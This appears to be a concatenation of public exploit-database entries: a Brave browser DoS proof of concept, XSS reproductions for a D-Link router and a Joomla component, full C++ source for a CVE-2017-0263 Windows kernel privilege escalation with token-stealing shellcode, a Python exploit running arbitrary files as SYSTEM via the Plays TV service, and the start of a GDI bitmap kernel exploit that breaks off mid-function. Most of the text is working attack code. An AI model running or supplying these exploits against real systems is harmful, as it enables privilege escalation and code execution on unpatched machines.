AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')
</script>
</html>
# Exploit Title:Brave Browser < 0.13.0 Denial of Service (resource consumption) via a window.close(self) js code.
# Date: 2017-10-16
# Exploit Author: Sahil Tikoo
# Vendor Homepage: https://brave.com
# Software Link: https://github.com/brave/browser-laptop
# Version: 0.12.5
# Tested on: Kali Linux,Ubuntu ,Windows OS
# CVE : CVE-2016-10718
<html>
<title>Brave Window Object Remote Denial of Service.</title>
<head></head>
<body><br><br>
<h1><center>Brave Window Object Remote Denial of Service</center></h1><br><br>
<h2><center>Proof of Concept</center></br></br> </h2>
<center>
<b>Click the below link to Trigger the Vulnerability..</b><br><br>
<hr></hr>
<hr></hr>
<b><center><a href="javascript:window.close(self);">Brave Window Object DoS Test POC</a></center>
</center>
</body>
</html>
######################################################################################
# Exploit Title: D-Link DIR-615 Wireless Router - Persistent Cross Site Scripting (XSS)
# Date: 14.04.2018
# Exploit Author: Sayan Chatterjee
# Vendor Homepage: http://www.dlink.co.in
# Hardware Link: http://www.dlink.co.in/products/?pid=678
# Category: Hardware (Wi-fi Router)
# Hardware Version: T1
# Firmware Version: 20.07
# Tested on: Windows 10
# CVE: CVE-2018-10110
#######################################################################################
Reproduction Steps:
------------------------------
1. Go to your wi-fi router gateway [i.e: http://192.168.0.1]
2. Go to –> “Maintenance” –> “Admin”
3. Create a user with name alert_"HI"
4. Refresh the page and you will be having “HI” popup
#######################################################################################
#######################################
# Exploit Title: Joomla! Component jDownloads 3.2.58 - Cross Site Scripting
# Google Dork: N/A
# Date: 14-04-2018
#######################################
# Exploit Author: Sureshbabu Narvaneni#
#######################################
# Author Blog : http://nullnews.in
# Vendor Homepage: http://www.jdownloads.com/
# Software Link: http://www.jdownloads.com/index.php/downloads/category/6-jdownloads.html
# Affected Version: 3.2.58
# Category: WebApps
# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686
# CVE : CVE-2018-10068
#
# 1. Vendor Description:
#
# Exclusive Download manager for Joomla!
#
# 2. Technical Description:
#
# Cross-site scripting (XSS) vulnerability in plupoad flash component in jDownloads before 3.2.59 allows remote attackers to inject arbitrary web script.
#
# 3. Proof Of Concept:
#
http://url/joomla/administrator/components/com_jdownloads/assets/plupload/js/Moxie.swf?target%g=alert&uid%g=nice
#
# 4. Solution:
#
# Upgrade to latest release.
# https://extensions.joomla.org/extension/jdownloads/
#
# 5. Reference:
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10068
# https://vel.joomla.org/resolved/2150-jdownloads-3-2-58-xss-cross-site-scripting
#####################################
#include <Windows.h>
#include <wingdi.h>
#include <iostream>
#include <Psapi.h>
#pragma comment(lib, "psapi.lib")
#define POCDEBUG 0
#if POCDEBUG == 1
#define POCDEBUG_BREAK() getchar()
#elif POCDEBUG == 2
#define POCDEBUG_BREAK() DebugBreak()
#else
#define POCDEBUG_BREAK()
#endif
static PVOID(__fastcall *pfnHMValidateHandle)(HANDLE, BYTE) = NULL;
static constexpr UINT num_PopupMenuCount = 2;
static constexpr UINT num_WndShadowCount = 3;
static constexpr UINT num_NtUserMNDragLeave = 0x11EC;
static constexpr UINT num_offset_WND_pcls = 0x64;
static HMENU hpopupMenu[num_PopupMenuCount] = { 0 };
static UINT iMenuCreated = 0;
static BOOL bDoneExploit = FALSE;
static DWORD popupMenuRoot = 0;
static HWND hWindowMain = NULL;
static HWND hWindowHunt = NULL;
static HWND hWindowList[0x100] = { 0 };
static UINT iWindowCount = 0;
static PVOID pvHeadFake = NULL;
static PVOID pvAddrFlags = NULL;
typedef struct _HEAD {
HANDLE h;
DWORD cLockObj;
} HEAD, *PHEAD;
typedef struct _THROBJHEAD {
HEAD head;
PVOID pti;
} THROBJHEAD, *PTHROBJHEAD;
typedef struct _DESKHEAD {
PVOID rpdesk;
PBYTE pSelf;
} DESKHEAD, *PDESKHEAD;
typedef struct _THRDESKHEAD {
THROBJHEAD thread;
DESKHEAD deskhead;
} THRDESKHEAD, *PTHRDESKHEAD;
typedef struct _SHELLCODE {
DWORD reserved;
DWORD pid;
DWORD off_CLS_lpszMenuName;
DWORD off_THREADINFO_ppi;
DWORD off_EPROCESS_ActiveLink;
DWORD off_EPROCESS_Token;
PVOID tagCLS[0x100];
BYTE pfnWindProc[];
} SHELLCODE, *PSHELLCODE;
static PSHELLCODE pvShellCode = NULL;
// Arguments:
// [ebp+08h]:pwnd = pwndWindowHunt;
// [ebp+0Ch]:msg = 0x9F9F;
// [ebp+10h]:wParam = popupMenuRoot;
// [ebp+14h]:lParam = NULL;
// In kernel-mode, the first argument is tagWND pwnd.
static
BYTE
xxPayloadWindProc[] = {
// Loader+0x108a:
// Judge if the `msg` is 0x9f9f value.
0x55, // push ebp
0x8b, 0xec, // mov ebp,esp
0x8b, 0x45, 0x0c, // mov eax,dword ptr [ebp+0Ch]
0x3d, 0x9f, 0x9f, 0x00, 0x00, // cmp eax,9F9Fh
0x0f, 0x85, 0x8d, 0x00, 0x00, 0x00, // jne Loader+0x1128
// Loader+0x109b:
// Judge if CS is 0x1b, which means in user-mode context.
0x66, 0x8c, 0xc8, // mov ax,cs
0x66, 0x83, 0xf8, 0x1b, // cmp ax,1Bh
0x0f, 0x84, 0x80, 0x00, 0x00, 0x00, // je Loader+0x1128
// Loader+0x10a8:
// Get the address of pwndWindowHunt to ECX.
// Recover the flags of pwndWindowHunt: zero bServerSideWindowProc.
// Get the address of pvShellCode to EDX by CALL-POP.
// Get the address of pvShellCode->tagCLS[0x100] to ESI.
// Get the address of popupMenuRoot to EDI.
0xfc, // cld
0x8b, 0x4d, 0x08, // mov ecx,dword ptr [ebp+8]
0xff, 0x41, 0x16, // inc dword ptr [ecx+16h]
0x60, // pushad
0xe8, 0x00, 0x00, 0x00, 0x00, // call $5
0x5a, // pop edx
0x81, 0xea, 0x43, 0x04, 0x00, 0x00, // sub edx,443h
0xbb, 0x00, 0x01, 0x00, 0x00, // mov ebx,100h
0x8d, 0x72, 0x18, // lea esi,[edx+18h]
0x8b, 0x7d, 0x10, // mov edi,dword ptr [ebp+10h]
// Loader+0x10c7:
0x85, 0xdb, // test ebx,ebx
0x74, 0x13, // je Loader+0x10de
// Loader+0x10cb:
// Judge if pvShellCode->tagCLS[ebx] == NULL
0xad, // lods dword ptr [esi]
0x4b, // dec ebx
0x83, 0xf8, 0x00, // cmp eax,0
0x74, 0xf5, // je Loader+0x10c7
// Loader+0x10d2:
// Judge if tagCLS->lpszMenuName == popupMenuRoot
0x03, 0x42, 0x08, // add eax,dword ptr [edx+8]
0x39, 0x38, // cmp dword ptr [eax],edi
0x75, 0xee, // jne Loader+0x10c7
// Loader+0x10d9:
// Zero tagCLS->lpszMenuName
0x83, 0x20, 0x00, // and dword ptr [eax],0
0xeb, 0xe9, // jmp Loader+0x10c7
// Loader+0x10de:
// Get the value of pwndWindowHunt->head.pti->ppi->Process to ECX.
// Get the value of pvShellCode->pid to EAX.
0x8b, 0x49, 0x08, // mov ecx,dword ptr [ecx+8]
0x8b, 0x5a, 0x0c, // mov ebx,dword ptr [edx+0Ch]
0x8b, 0x0c, 0x0b, // mov ecx,dword ptr [ebx+ecx]
0x8b, 0x09, // mov ecx,dword ptr [ecx]
0x8b, 0x5a, 0x10, // mov ebx,dword ptr [edx+10h]
0x8b, 0x42, 0x04, // mov eax,dword ptr [edx+4]
0x51, // push ecx
// Loader+0x10f0:
// Judge if EPROCESS->UniqueId == pid.
0x39, 0x44, 0x0b, 0xfc, // cmp dword ptr [ebx+ecx-4],eax
0x74, 0x07, // je Loader+0x10fd
// Loader+0x10f6:
// Get next EPROCESS to ECX by ActiveLink.
0x8b, 0x0c, 0x0b, // mov ecx,dword ptr [ebx+ecx]
0x2b, 0xcb, // sub ecx,ebx
0xeb, 0xf3, // jmp Loader+0x10f0
// Loader+0x10fd:
// Get current EPROCESS to EDI.
0x8b, 0xf9, // mov edi,ecx
0x59, // pop ecx
// Loader+0x1100:
// Judge if EPROCESS->UniqueId == 4
0x83, 0x7c, 0x0b, 0xfc, 0x04, // cmp dword ptr [ebx+ecx-4],4
0x74, 0x07, // je Loader+0x110e
// Loader+0x1107:
// Get next EPROCESS to ECX by ActiveLink.
0x8b, 0x0c, 0x0b, // mov ecx,dword ptr [ebx+ecx]
0x2b, 0xcb, // sub ecx,ebx
0xeb, 0xf2, // jmp Loader+0x1100
// Loader+0x110e:
// Get system EPROCESS to ESI.
// Get the value of system EPROCESS->Token to current EPROCESS->Token.
// Add 2 to OBJECT_HEADER->PointerCount of system Token.
// Return 0x9F9F to the caller.
0x8b, 0xf1, // mov esi,ecx
0x8b, 0x42, 0x14, // mov eax,dword ptr [edx+14h]
0x03, 0xf0, // add esi,eax
0x03, 0xf8, // add edi,eax
0xad, // lods dword ptr [esi]
0xab, // stos dword ptr es:[edi]
0x83, 0xe0, 0xf8, // and eax,0FFFFFFF8h
0x83, 0x40, 0xe8, 0x02, // add dword ptr [eax-18h],2
0x61, // popad
0xb8, 0x9f, 0x9f, 0x00, 0x00, // mov eax,9F9Fh
0xeb, 0x05, // jmp Loader+0x112d
// Loader+0x1128:
// Failed in processing.
0xb8, 0x01, 0x00, 0x00, 0x00, // mov eax,1
// Loader+0x112d:
0xc9, // leave
0xc2, 0x10, 0x00, // ret 10h
};
static
VOID
xxGetHMValidateHandle(VOID)
{
HMODULE hModule = LoadLibraryA("USER32.DLL");
PBYTE pfnIsMenu = (PBYTE)GetProcAddress(hModule, "IsMenu");
PBYTE Address = NULL;
for (INT i = 0; i < 0x30; i++)
{
if (*(WORD *)(i + pfnIsMenu) != 0x02B2)
{
continue;
}
i += 2;
if (*(BYTE *)(i + pfnIsMenu) != 0xE8)
{
continue;
}
Address = *(DWORD *)(i + pfnIsMenu + 1) + pfnIsMenu;
Address = Address + i + 5;
pfnHMValidateHandle = (PVOID(__fastcall *)(HANDLE, BYTE))Address;
break;
}
}
#define TYPE_WINDOW 1
static
PVOID
xxHMValidateHandleEx(HWND hwnd)
{
return pfnHMValidateHandle((HANDLE)hwnd, TYPE_WINDOW);
}
static
PVOID
xxHMValidateHandle(HWND hwnd)
{
PVOID RetAddr = NULL;
if (!pfnHMValidateHandle)
{
xxGetHMValidateHandle();
}
if (pfnHMValidateHandle)
{
RetAddr = xxHMValidateHandleEx(hwnd);
}
return RetAddr;
}
static
ULONG_PTR
xxSyscall(UINT num, ULONG_PTR param1, ULONG_PTR param2)
{
__asm { mov eax, num };
__asm { int 2eh };
}
static
LRESULT
WINAPI
xxShadowWindowProc(
_In_ HWND hwnd,
_In_ UINT msg,
_In_ WPARAM wParam,
_In_ LPARAM lParam
)
{
if (msg != WM_NCDESTROY || bDoneExploit)
{
return DefWindowProcW(hwnd, msg, wParam, lParam);
}
std::cout << "::" << __FUNCTION__ << std::endl;
POCDEBUG_BREAK();
DWORD dwPopupFake[0xD] = { 0 };
dwPopupFake[0x0] = (DWORD)0x00098208; //->flags
dwPopupFake[0x1] = (DWORD)pvHeadFake; //->spwndNotify
dwPopupFake[0x2] = (DWORD)pvHeadFake; //->spwndPopupMenu
dwPopupFake[0x3] = (DWORD)pvHeadFake; //->spwndNextPopup
dwPopupFake[0x4] = (DWORD)pvAddrFlags - 4; //->spwndPrevPopup
dwPopupFake[0x5] = (DWORD)pvHeadFake; //->spmenu
dwPopupFake[0x6] = (DWORD)pvHeadFake; //->spmenuAlternate
dwPopupFake[0x7] = (DWORD)pvHeadFake; //->spwndActivePopup
dwPopupFake[0x8] = (DWORD)0xFFFFFFFF; //->ppopupmenuRoot
dwPopupFake[0x9] = (DWORD)pvHeadFake; //->ppmDelayedFree
dwPopupFake[0xA] = (DWORD)0xFFFFFFFF; //->posSelectedItem
dwPopupFake[0xB] = (DWORD)pvHeadFake; //->posDropped
dwPopupFake[0xC] = (DWORD)0;
for (UINT i = 0; i < iWindowCount; ++i)
{
SetClassLongW(hWindowList[i], GCL_MENUNAME, (LONG)dwPopupFake);
}
xxSyscall(num_NtUserMNDragLeave, 0, 0);
LRESULT Triggered = SendMessageW(hWindowHunt, 0x9F9F, popupMenuRoot, 0);
bDoneExploit = Triggered == 0x9F9F;
return DefWindowProcW(hwnd, msg, wParam, lParam);
}
#define MENUCLASS_NAME L"#32768"
static
LRESULT
CALLBACK
xxWindowHookProc(INT code, WPARAM wParam, LPARAM lParam)
{
tagCWPSTRUCT *cwp = (tagCWPSTRUCT *)lParam;
static HWND hwndMenuHit = 0;
static UINT iShadowCount = 0;
if (bDoneExploit || iMenuCreated != num_PopupMenuCount - 2 || cwp->message != WM_NCCREATE)
{
return CallNextHookEx(0, code, wParam, lParam);
}
std::cout << "::" << __FUNCTION__ << std::endl;
WCHAR szTemp[0x20] = { 0 };
GetClassNameW(cwp->hwnd, szTemp, 0x14);
if (!wcscmp(szTemp, L"SysShadow") && hwndMenuHit != NULL)
{
std::cout << "::iShadowCount=" << iShadowCount << std::endl;
POCDEBUG_BREAK();
if (++iShadowCount == num_WndShadowCount)
{
SetWindowLongW(cwp->hwnd, GWL_WNDPROC, (LONG)xxShadowWindowProc);
}
else
{
SetWindowPos(hwndMenuHit, NULL, 0, 0, 0, 0, SWP_NOSIZE | SWP_NOMOVE | SWP_NOZORDER | SWP_HIDEWINDOW);
SetWindowPos(hwndMenuHit, NULL, 0, 0, 0, 0, SWP_NOSIZE | SWP_NOMOVE | SWP_NOZORDER | SWP_SHOWWINDOW);
}
}
else if (!wcscmp(szTemp, MENUCLASS_NAME))
{
hwndMenuHit = cwp->hwnd;
std::cout << "::hwndMenuHit=" << hwndMenuHit << std::endl;
}
return CallNextHookEx(0, code, wParam, lParam);
}
#define MN_ENDMENU 0x1F3
static
VOID
CALLBACK
xxWindowEventProc(
HWINEVENTHOOK hWinEventHook,
DWORD event,
HWND hwnd,
LONG idObject,
LONG idChild,
DWORD idEventThread,
DWORD dwmsEventTime
)
{
UNREFERENCED_PARAMETER(hWinEventHook);
UNREFERENCED_PARAMETER(event);
UNREFERENCED_PARAMETER(idObject);
UNREFERENCED_PARAMETER(idChild);
UNREFERENCED_PARAMETER(idEventThread);
UNREFERENCED_PARAMETER(dwmsEventTime);
std::cout << "::" << __FUNCTION__ << std::endl;
if (iMenuCreated == 0)
{
popupMenuRoot = *(DWORD *)((PBYTE)xxHMValidateHandle(hwnd) + 0xb0);
}
if (++iMenuCreated >= num_PopupMenuCount)
{
std::cout << ">>SendMessage(MN_ENDMENU)" << std::endl;
POCDEBUG_BREAK();
SendMessageW(hwnd, MN_ENDMENU, 0, 0);
}
else
{
std::cout << ">>SendMessage(WM_LBUTTONDOWN)" << std::endl;
POCDEBUG_BREAK();
SendMessageW(hwnd, WM_LBUTTONDOWN, 1, 0x00020002);
}
}
static
BOOL
xxRegisterWindowClassW(LPCWSTR lpszClassName, INT cbWndExtra)
{
WNDCLASSEXW wndClass = { 0 };
wndClass = { 0 };
wndClass.cbSize = sizeof(WNDCLASSEXW);
wndClass.lpfnWndProc = DefWindowProcW;
wndClass.cbWndExtra = cbWndExtra;
wndClass.hInstance = GetModuleHandleA(NULL);
wndClass.lpszMenuName = NULL;
wndClass.lpszClassName = lpszClassName;
return RegisterClassExW(&wndClass);
}
static
HWND
xxCreateWindowExW(LPCWSTR lpszClassName, DWORD dwExStyle, DWORD dwStyle)
{
return CreateWindowExW(dwExStyle,
lpszClassName,
NULL,
dwStyle,
0,
0,
1,
1,
NULL,
NULL,
GetModuleHandleA(NULL),
NULL);
}
static
VOID xxCreateCmdLineProcess(VOID)
{
STARTUPINFO si = { sizeof(si) };
PROCESS_INFORMATION pi = { 0 };
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOW;
WCHAR wzFilePath[MAX_PATH] = { L"cmd.exe" };
BOOL bReturn = CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
if (bReturn) CloseHandle(pi.hThread), CloseHandle(pi.hProcess);
}
static
DWORD
WINAPI
xxTrackExploitEx(LPVOID lpThreadParameter)
{
UNREFERENCED_PARAMETER(lpThreadParameter);
std::cout << "::" << __FUNCTION__ << std::endl;
POCDEBUG_BREAK();
for (INT i = 0; i < num_PopupMenuCount; i++)
{
MENUINFO mi = { 0 };
hpopupMenu[i] = CreatePopupMenu();
mi.cbSize = sizeof(mi);
mi.fMask = MIM_STYLE;
mi.dwStyle = MNS_AUTODISMISS | MNS_MODELESS | MNS_DRAGDROP;
SetMenuInfo(hpopupMenu[i], &mi);
}
for (INT i = 0; i < num_PopupMenuCount; i++)
{
LPCSTR szMenuItem = "item";
AppendMenuA(hpopupMenu[i],
MF_BYPOSITION | MF_POPUP,
(i >= num_PopupMenuCount - 1) ? 0 : (UINT_PTR)hpopupMenu[i + 1],
szMenuItem);
}
for (INT i = 0; i < 0x100; i++)
{
WNDCLASSEXW Class = { 0 };
WCHAR szTemp[20] = { 0 };
HWND hwnd = NULL;
wsprintfW(szTemp, L"%x-%d", rand(), i);
Class.cbSize = sizeof(WNDCLASSEXA);
Class.lpfnWndProc = DefWindowProcW;
Class.cbWndExtra = 0;
Class.hInstance = GetModuleHandleA(NULL);
Class.lpszMenuName = NULL;
Class.lpszClassName = szTemp;
if (!RegisterClassExW(&Class))
{
continue;
}
hwnd = CreateWindowExW(0, szTemp, NULL, WS_OVERLAPPED,
0,
0,
0,
0,
NULL,
NULL,
GetModuleHandleA(NULL),
NULL);
if (hwnd == NULL)
{
continue;
}
hWindowList[iWindowCount++] = hwnd;
}
for (INT i = 0; i < iWindowCount; i++)
{
pvShellCode->tagCLS[i] = *(PVOID *)((PBYTE)xxHMValidateHandle(hWindowList[i]) + num_offset_WND_pcls);
}
DWORD fOldProtect = 0;
VirtualProtect(pvShellCode, 0x1000, PAGE_EXECUTE_READ, &fOldProtect);
xxRegisterWindowClassW(L"WNDCLASSMAIN", 0x000);
hWindowMain = xxCreateWindowExW(L"WNDCLASSMAIN",
WS_EX_LAYERED | WS_EX_TOOLWINDOW | WS_EX_TOPMOST,
WS_VISIBLE);
xxRegisterWindowClassW(L"WNDCLASSHUNT", 0x200);
hWindowHunt = xxCreateWindowExW(L"WNDCLASSHUNT",
WS_EX_LEFT,
WS_OVERLAPPED);
PTHRDESKHEAD head = (PTHRDESKHEAD)xxHMValidateHandle(hWindowHunt);
PBYTE pbExtra = head->deskhead.pSelf + 0xb0 + 4;
pvHeadFake = pbExtra + 0x44;
for (UINT x = 0; x < 0x7F; x++)
{
SetWindowLongW(hWindowHunt, sizeof(DWORD) * (x + 1), (LONG)pbExtra);
}
PVOID pti = head->thread.pti;
SetWindowLongW(hWindowHunt, 0x28, 0);
SetWindowLongW(hWindowHunt, 0x50, (LONG)pti); // pti
SetWindowLongW(hWindowHunt, 0x6C, 0);
SetWindowLongW(hWindowHunt, 0x1F8, 0xC033C033);
SetWindowLongW(hWindowHunt, 0x1FC, 0xFFFFFFFF);
pvAddrFlags = *(PBYTE *)((PBYTE)xxHMValidateHandle(hWindowHunt) + 0x10) + 0x16;
SetWindowLongW(hWindowHunt, GWL_WNDPROC, (LONG)pvShellCode->pfnWindProc);
SetWindowsHookExW(WH_CALLWNDPROC, xxWindowHookProc,
GetModuleHandleA(NULL),
GetCurrentThreadId());
SetWinEventHook(EVENT_SYSTEM_MENUPOPUPSTART, EVENT_SYSTEM_MENUPOPUPSTART,
GetModuleHandleA(NULL),
xxWindowEventProc,
GetCurrentProcessId(),
GetCurrentThreadId(),
0);
TrackPopupMenuEx(hpopupMenu[0], 0, 0, 0, hWindowMain, NULL);
MSG msg = { 0 };
while (GetMessageW(&msg, NULL, 0, 0))
{
TranslateMessage(&msg);
DispatchMessageW(&msg);
}
return 0;
}
INT POC_CVE20170263(VOID)
{
std::cout << "-------------------" << std::endl;
std::cout << "POC - CVE-2017-0263" << std::endl;
std::cout << "-------------------" << std::endl;
pvShellCode = (PSHELLCODE)VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (pvShellCode == NULL)
{
return 0;
}
ZeroMemory(pvShellCode, 0x1000);
pvShellCode->pid = GetCurrentProcessId();
pvShellCode->off_CLS_lpszMenuName = 0x050;
pvShellCode->off_THREADINFO_ppi = 0x0b8;
pvShellCode->off_EPROCESS_ActiveLink = 0x0b8;
pvShellCode->off_EPROCESS_Token = 0x0f8;
CopyMemory(pvShellCode->pfnWindProc, xxPayloadWindProc, sizeof(xxPayloadWindProc));
std::cout << "CREATE WORKER THREAD..." << std::endl;
POCDEBUG_BREAK();
HANDLE hThread = CreateThread(NULL, 0, xxTrackExploitEx, NULL, 0, NULL);
if (hThread == NULL)
{
return FALSE;
}
while (!bDoneExploit)
{
Sleep(500);
}
xxCreateCmdLineProcess();
DestroyWindow(hWindowMain);
TerminateThread(hThread, 0);
std::cout << "-------------------" << std::endl;
getchar();
return bDoneExploit;
}
INT main(INT argc, CHAR *argv[])
{
POC_CVE20170263();
return 0;
}
########################################################################
# http://support.amd.com/en-us/download?cmpid=CCCOffline -
# Click "Automatically Detect - Download Now"
# Installation Automatically Installs "Raptr, Inc Plays TV Service"
#
# OR
#
# https://plays.tv/download
#
# Target OS: Windows( Any )
# Privilege: SYSTEM
# Type: Arbitrary File Execution
#
# Notes: Second minor bug allows for arbitrary file write of
# uncontrolled data using the /extract_files path.
#
########################################################################
#!/usr/bin/python3
import urllib.request
import json
import hashlib
def check_svc( path, data ):
#Setup request
request = urllib.request.Request(addr)
#add post data
try:
resp = urllib.request.urlopen(request, "data".encode("utf-8"))
return "[-] Not Raptr, Plays TV service"
except urllib.error.HTTPError as err:
error_message = err.read().decode("utf-8")
if error_message == 'Security failed - Missing hash or message[data]':
return "[+] Raptr, Plays TV service"
def post_req( path, data ):
secret_key = 'a%qs0t33QgiE6ut^0I&Y'
#Setup request
request = urllib.request.Request(addr)
json_data = json.dumps(data)
m = hashlib.md5()
hash_data = path + json_data + secret_key
m.update(hash_data.encode('utf8'))
hash_str = m.hexdigest()
#add post data
p_data = urllib.parse.urlencode({'data' : json_data, 'hash' : hash_str }).encode("utf-8")
resp = urllib.request.urlopen(request, p_data)
return resp.read()
#Target IP address
ip = '127.0.0.1'
##############################################################
# The service binds to an ephemeral port defined at
# [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\PlaysTV\Service]
##############################################################
port = 50452
##############################################################
# The service calls CreateProcess with the following format:
# '"%s" -appdata "%s" -auto_installed 1' % (installer, appdata)
#
# One way to achieving remote code execution is to use SMB
# cmd = "\\\\<IP ADDRESS>\\<SHARE>\\<FILE>"
##############################################################
cmd = "C:\\Windows\\System32\\calc.exe" #Local Execution
data = {
"installer": cmd,
"appdata": cmd
}
#Set url
path = '/execute_installer'
addr = 'http://' + ip + ':' + str(port) + path
#Check if the remote service is a Raptr Plays TV svc
#ret = check_svc(data, path)
#print(ret)
#Exploit service
ret = post_req(path, data)
print(ret)
#include <Windows.h>
#include <wingdi.h>
#include <iostream>
#include <Psapi.h>
#pragma comment(lib, "psapi.lib")
#define POCDEBUG 0
#if POCDEBUG == 1
#define POCDEBUG_BREAK() getchar()
#elif POCDEBUG == 2
#define POCDEBUG_BREAK() DebugBreak()
#else
#define POCDEBUG_BREAK()
#endif
static HBITMAP hBmpHunted = NULL;
static HBITMAP hBmpExtend = NULL;
static DWORD iMemHunted = NULL;
static PDWORD pBmpHunted = NULL;
CONST LONG maxCount = 0x6666667;
CONST LONG maxLimit = 0x04E2000;
CONST LONG maxTimes = 4000;
CONST LONG tmpTimes = 5500;
static POINT point[maxCount] = { 0, 0 };
static HBITMAP hbitmap[maxTimes] = { NULL };
static HACCEL hacctab[tmpTimes] = { NULL };
CONST LONG iExtHeight = 948;
CONST LONG iExtpScan0 = 951;
static
VOID
xxCreateClipboard(DWORD Size)
{
PBYTE Buffer = (PBYTE)malloc(Size);
FillMemory(Buffer, Size, 0x41);
Buffer[Size - 1] = 0x00;
HGLOBAL hMem = GlobalAlloc(GMEM_MOVEABLE, (SIZE_T)Size);
CopyMemory(GlobalLock(hMem), Buffer, (SIZE_T)Size);
GlobalUnlock(hMem);
SetClipboardData(CF_TEXT, hMem);
}
static
BOOL xxPoint(LONG id, DWORD Value)
{
LONG iLeng = 0x00;
pBmpHunted[id] = Value;
iLeng = SetBitmapBits(hBmpHunted, 0x1000, pBmpHunted);
if (iLeng < 0x1000)
{
return FALSE;
}
return TRUE;
}
static
BOOL xxPointToHit(LONG addr, PVOID pvBits, DWORD cb)
{
LONG iLeng = 0;
pBmpHunted[iExtpScan0] = addr;
iLeng = SetBitmapBits(hBmpHunted, 0x1000, pBmpHunted);
if (iLeng < 0x1000)
{
return FALSE;
}
iLeng = SetBitmapBits(hBmpExtend, cb, pvBits);
if (iLeng < (LONG)cb)
{
return FALSE;
}
return TRUE;
}
static
BOOL xxPointToGet(LONG addr, PVOID pvBits, DWORD cb)
{
LONG iLeng = 0;
pBmpHunted[iExtpScan0] = addr;
iLeng = SetBitmapBits(hBmpHunted, 0x1000, pBmpHunted);
if (iLeng < 0x1000)
{
return FALSE;
}
iLeng = GetBitmapBits(hBmpExtend, cb, pvBits);
if (iLeng < (LONG)cb)
{
return FALSE;
}
return TRUE;
}
static
VOID xxInitPoints(VOID)
{
for (LONG i = 0; i < maxCount; i++)
{
point[i].x = (i % 2) + 1;
point[i].y = 100;
}
for (LONG i = 0; i < 75; i++)
{
point[i].y = i + 1;
}
}
static
BOOL xxDrawPolyLines(HDC hdc)
{
for (LONG i = maxCount; i > 0; i -= min(maxLimit, i))
{
// std::cout << ":" << (PVOID)i << std::endl;
if (!PolylineTo(hdc, &point[maxCount - i], min(maxLimit, i)))
{
return FALSE;
}
}
return TRUE;
}
static
BOOL xxCreateBitmaps(INT nWidth, INT Height, UINT nbitCount)
{
POCDEBUG_BREAK();
for (LONG i = 0; i < maxTimes; i++)
{
hbitmap[i] = CreateBitmap(nWidth, Height, 1, nbitCount, NULL);
if (hbitmap[i] == NULL)
{
return FALSE;
}
}
return TRUE;
}
static
BOOL xxCreateAcceleratorTables(VOID)
{
POCDEBUG_BREAK();
for (LONG i = 0; i < tmpTimes; i++)
{
ACCEL acckey[0x0D] = { 0 };
hacctab[i] = CreateAcceleratorTableA(acckey, 0x0D);
if (hacctab[i] == NULL)
{
return FALSE;
}
}
return TRUE;
}
static
BOOL xxDeleteBitmaps(VOID)
{
BOOL bReturn = FALSE;
POCDEBUG_BREAK();
for (LONG i = 0; i < maxTimes; i++)
{
bReturn = DeleteObject(hbitmap[i]);
hbitmap[i] = NULL;
}
return bReturn;
}
static
VOID xxCreateClipboards(VOID)
{
POCDEBUG_BREAK();
for (LONG i = 0; i < maxTimes; i++)
{
xxCreateClipboard(0xB5C);
}
}
static
BOOL xxDigHoleInAcceleratorTables(LONG b, LONG e)
{
BOOL bReturn = FALSE;
for (LONG i = b; i < e; i++)
{
bReturn = DestroyAcceleratorTable(hacctab[i]);
hacctab[i] = NULL;
}
return bReturn;
}
static
VOID xxDeleteAcceleratorTables(VOID)
{
